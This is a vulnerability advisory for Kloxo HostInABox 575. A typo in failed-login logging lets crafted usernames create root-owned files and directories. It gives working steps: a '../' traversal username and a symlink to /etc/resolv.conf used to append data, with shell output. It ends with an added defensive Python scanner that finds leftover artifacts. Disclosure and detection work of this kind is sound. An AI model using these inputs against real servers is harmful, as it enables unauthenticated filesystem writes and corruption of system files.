Kloxo HostInABox 575 - Remote, unauthenticated users could create files and directories with names that they partially control. Local users could append uncontrolled data to any file



DESCRIPTION


Due to a bug in the logging routine for failed login attempts (a simple typo), a remote, unauthenticated person could create files and directories on the local filesystem via a crafted username in the username field of the login page. This also allowed local users to append uncontrolled data to any file on the box.



IMPACT


Remote users could write all over the filesystem, while local users could corrupt files.


1. Browse to http://x.x.x.x:7778 (or domain:7778)
2. In the username field, enter anything, valid account or not. We'll use: test
3. In the password field, enter anything. We'll use: test
4. Click the login button


This will cause this directory: /usr/local/lxlabs/kloxo/log to now have this file: Failed Login attempt to test from x.x.x.x

(where x.x.x.x is the IP address that the failed login attempt came from, of course). Note that the file is written as root. Now append a "/" to "test" and attempt to log in again.

This causes the following directory to be created: /usr/local/lxlabs/kloxo/log/Failed Login attempt to test

which contains this file: from x.x.x.x


Directory traversal can also be used, which will ultimately allow a local user to append data to any file on the box via a symlink attack.

Directory traversal example on the login page:

username: ../../../../../../../../hello
password: test


[root@testing574 /usr/local/lxlabs/kloxo/log]# ls -l / | grep hello
-rw-r--r--  1 root root     24 May 19 16:56 hello from x.x.x.x

Since the user can control the location on the filesystem that the file will be written to, they can use a symlink attack to append junk to the end of a file:

[user1@testing574 /tmp]$ ln -s /etc/resolv.conf 'test from x.x.x.x'

* Replace "x.x.x.x" with the IP address that you'll be attempting to log in from.

Attempt to log in with any password and this username: ../../../../../../../tmp/test

Now observe that /etc/resolv.conf had data appended to it:

[user1@testing574 tmp]$ cat /etc/resolv.conf
nameserver 4.2.2.1
nameserver 4.2.2.2
20:09 May/20/2009: NULL
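
To check a host for leftovers of this bug, the following added example (not part of the original advisory and not Kloxo code) walks a directory tree and flags entries whose names have the shapes shown above: the whole "Failed Login attempt to ..." message, or its " from x.x.x.x" tail. It assumes the source address is IPv4, and the function names are hypothetical.

```python
import os
import re
import stat
import sys

# Name shapes taken from the advisory: the whole log message, or only its
# "from <IPv4>" tail when the username ended in "/" or contained "../".
# Assumption: the logged source address is IPv4.
PREFIX = "Failed Login attempt to"
TAIL = re.compile(r"(^| )from \d{1,3}(\.\d{1,3}){3}$")


def classify(name, mode):
    """Return a finding label for one directory entry, or None."""
    kind = "dir" if stat.S_ISDIR(mode) else "symlink" if stat.S_ISLNK(mode) else "file"
    if name.startswith(PREFIX):
        return f"{kind}: log message used as name"
    if TAIL.search(name):
        if kind == "symlink":
            # A link named like the message tail redirects the root-owned append.
            return "symlink: staged append target"
        return f"{kind}: log message tail used as name"
    return None


def find_artifacts(root):
    """Walk root without following symlinks; return sorted (path, label) pairs."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode  # lstat: inspect the link itself
            except OSError:
                continue  # entry vanished or is unreadable
            label = classify(name, mode)
            if label:
                findings.append((path, label))
    return sorted(findings)


if __name__ == "__main__":
    for path, label in find_artifacts(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{label}\t{path}")
```

The match is a name heuristic, so review each hit before removing it; a flagged symlink in a world-writable directory such as /tmp also identifies which file would receive the appended line.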